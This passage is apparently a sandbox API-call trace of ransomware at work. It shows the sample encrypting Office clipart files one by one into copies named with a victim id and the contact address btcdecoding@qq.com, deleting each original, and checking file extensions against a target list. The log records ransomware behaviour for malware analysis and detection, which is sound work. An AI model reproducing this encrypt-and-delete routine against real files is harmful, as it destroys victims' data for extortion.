dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.394] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.394] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0055.394] GetLastError () returned 0x0 [0055.394] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x30c2, lpOverlapped=0x0) returned 1 [0055.395] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x30d0, lpOverlapped=0x0) returned 1 [0055.396] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.396] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.397] SetEndOfFile (hFile=0x17c) returned 1 [0055.397] CloseHandle (hObject=0x17c) returned 1 [0055.397] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.397] SetEndOfFile (hFile=0x238) returned 1 [0055.398] CloseHandle (hObject=0x238) returned 1 [0055.398] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.398] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf")) returned 1 [0055.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0055.398] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0055.398] lstrlenW (lpString=".doc") returned 4 [0055.398] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.398] lstrlenW (lpString=".docx") returned 5 [0055.398] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.398] lstrlenW (lpString=".pdf") returned 4 [0055.398] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.399] lstrlenW (lpString=".xls") returned 4 [0055.399] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.399] lstrlenW (lpString=".xlsx") returned 5 [0055.399] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.399] lstrlenW (lpString=".ppt") returned 4 [0055.399] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0055.399] lstrlenW (lpString=".zip") returned 4 [0055.399] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.399] lstrlenW (lpString=".rar") returned 4 [0055.399] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.399] lstrlenW (lpString=".bz2") returned 4 [0055.399] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.399] lstrlenW (lpString=".7z") returned 3 [0055.399] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0055.399] lstrlenW (lpString=".dbf") returned 4 [0055.399] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0055.399] lstrlenW (lpString=".1cd") returned 4 [0055.399] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.399] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned 63 [0055.399] lstrlenW (lpString=".jpg") returned 4 [0055.399] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.399] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.399] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.400] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0055.400] GetLastError () returned 0x0 [0055.400] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xa54, lpOverlapped=0x0) returned 1 [0055.401] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xa60, lpOverlapped=0x0) returned 1 [0055.402] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.402] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.402] SetEndOfFile (hFile=0x17c) returned 1 [0055.405] CloseHandle (hObject=0x17c) returned 1 [0055.405] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.405] SetEndOfFile (hFile=0x238) returned 1 [0055.406] CloseHandle (hObject=0x238) returned 1 [0055.406] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.406] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf")) returned 1 [0055.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0055.406] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0055.406] lstrlenW (lpString=".doc") returned 4 [0055.406] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.406] lstrlenW (lpString=".docx") returned 5 [0055.407] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.407] lstrlenW (lpString=".pdf") returned 4 [0055.407] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.407] lstrlenW (lpString=".xls") returned 4 [0055.407] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.407] lstrlenW (lpString=".xlsx") returned 5 [0055.407] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.407] lstrlenW (lpString=".ppt") returned 4 [0055.407] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0055.407] lstrlenW (lpString=".zip") returned 4 [0055.407] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.407] lstrlenW (lpString=".rar") returned 4 [0055.407] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.407] lstrlenW (lpString=".bz2") returned 4 [0055.407] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.407] lstrlenW (lpString=".7z") returned 3 [0055.407] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0055.407] lstrlenW (lpString=".dbf") returned 4 [0055.407] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0055.407] lstrlenW (lpString=".1cd") returned 4 [0055.407] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.407] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned 63 [0055.407] lstrlenW (lpString=".jpg") returned 4 [0055.407] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.408] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.408] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.408] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0055.408] GetLastError () returned 0x0 [0055.408] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1498, lpOverlapped=0x0) returned 1 [0055.410] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x14a0, lpOverlapped=0x0) returned 1 [0055.411] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.411] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.411] SetEndOfFile (hFile=0x17c) returned 1 [0055.411] CloseHandle (hObject=0x17c) returned 1 [0055.411] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.411] SetEndOfFile (hFile=0x238) returned 1 [0055.412] CloseHandle (hObject=0x238) returned 1 [0055.412] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.412] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00269_.wmf")) returned 1 [0055.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0055.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0055.412] lstrlenW (lpString=".doc") returned 4 [0055.412] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.412] lstrlenW (lpString=".docx") returned 5 [0055.413] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.413] lstrlenW (lpString=".pdf") returned 4 [0055.413] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.413] lstrlenW (lpString=".xls") returned 4 [0055.413] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.413] lstrlenW (lpString=".xlsx") returned 5 [0055.413] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.413] lstrlenW (lpString=".ppt") returned 4 [0055.413] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0055.413] lstrlenW (lpString=".zip") returned 4 [0055.413] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.413] lstrlenW (lpString=".rar") returned 4 [0055.413] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.413] lstrlenW (lpString=".bz2") returned 4 [0055.413] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.413] lstrlenW (lpString=".7z") returned 3 [0055.413] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0055.413] lstrlenW (lpString=".dbf") returned 4 [0055.413] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0055.413] lstrlenW (lpString=".1cd") returned 4 [0055.413] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00269_.WMF") returned 63 [0055.413] lstrlenW (lpString=".jpg") returned 4 [0055.413] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.416] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.417] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.417] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0055.417] GetLastError () returned 0x0 [0055.417] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xbc8, lpOverlapped=0x0) returned 1 [0055.418] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xbd0, lpOverlapped=0x0) returned 1 [0055.486] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.486] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.486] SetEndOfFile (hFile=0x17c) returned 1 [0055.486] CloseHandle (hObject=0x17c) returned 1 [0055.487] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.487] SetEndOfFile (hFile=0x238) returned 1 [0055.487] CloseHandle (hObject=0x238) returned 1 [0055.488] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.488] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00270_.wmf")) returned 1 [0055.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0055.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0055.488] lstrlenW (lpString=".doc") returned 4 [0055.488] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.488] lstrlenW (lpString=".docx") returned 5 [0055.488] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.488] lstrlenW (lpString=".pdf") returned 4 [0055.488] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.488] lstrlenW (lpString=".xls") returned 4 [0055.488] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.488] lstrlenW (lpString=".xlsx") returned 5 [0055.488] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.488] lstrlenW (lpString=".ppt") returned 4 [0055.488] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.488] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0055.489] lstrlenW (lpString=".zip") returned 4 [0055.489] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.489] lstrlenW (lpString=".rar") returned 4 [0055.489] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.489] lstrlenW (lpString=".bz2") returned 4 [0055.489] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.489] lstrlenW (lpString=".7z") returned 3 [0055.489] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0055.489] lstrlenW (lpString=".dbf") returned 4 [0055.489] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0055.489] lstrlenW (lpString=".1cd") returned 4 [0055.489] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.489] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00270_.WMF") returned 63 [0055.489] lstrlenW (lpString=".jpg") returned 4 [0055.489] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.489] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.489] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.490] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0055.490] GetLastError () returned 0x0 [0055.490] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0xec4, lpOverlapped=0x0) returned 1 [0055.491] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xed0, lpOverlapped=0x0) returned 1 [0055.492] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.492] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.492] SetEndOfFile (hFile=0x17c) returned 1 [0055.493] CloseHandle (hObject=0x17c) returned 1 [0055.493] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.493] SetEndOfFile (hFile=0x238) returned 1 [0055.494] CloseHandle (hObject=0x238) returned 1 [0055.494] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.494] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00273_.wmf")) returned 1 [0055.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0055.494] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0055.494] lstrlenW (lpString=".doc") returned 4 [0055.494] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.494] lstrlenW (lpString=".docx") returned 5 [0055.494] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.494] lstrlenW (lpString=".pdf") returned 4 [0055.494] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.494] lstrlenW (lpString=".xls") returned 4 [0055.494] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0055.494] lstrlenW (lpString=".xlsx") returned 5 [0055.495] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0055.495] lstrlenW (lpString=".ppt") returned 4 [0055.495] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0055.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0055.495] lstrlenW (lpString=".zip") returned 4 [0055.495] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0055.495] lstrlenW (lpString=".rar") returned 4 [0055.495] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0055.495] lstrlenW (lpString=".bz2") returned 4 [0055.495] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0055.495] lstrlenW (lpString=".7z") returned 3 [0055.495] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0055.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0055.495] lstrlenW (lpString=".dbf") returned 4 [0055.495] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0055.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0055.495] lstrlenW (lpString=".1cd") returned 4 [0055.495] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0055.495] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00273_.WMF") returned 63 [0055.495] lstrlenW (lpString=".jpg") returned 4 [0055.495] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0055.495] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.495] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.496] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00274_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0055.496] GetLastError () returned 0x0 [0055.496] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x1044, lpOverlapped=0x0) returned 1 [0055.497] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0x1050, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0x1050, lpOverlapped=0x0) returned 1 [0055.498] ReadFile (in: hFile=0x238, lpBuffer=0x3a80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2effed4, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesRead=0x2effed4*=0x0, lpOverlapped=0x0) returned 1 [0055.498] WriteFile (in: hFile=0x17c, lpBuffer=0x3a80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2effc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a80020*, lpNumberOfBytesWritten=0x2effc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.499] SetEndOfFile (hFile=0x17c) returned 1 [0055.499] CloseHandle (hObject=0x17c) returned 1 [0055.499] SetFilePointerEx (in: hFile=0x238, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2effec8 | out: lpNewFilePointer=0x0) returned 1 [0055.499] SetEndOfFile (hFile=0x238) returned 1 [0055.500] CloseHandle (hObject=0x238) returned 1 [0055.500] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00274_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0055.500] DeleteFileW 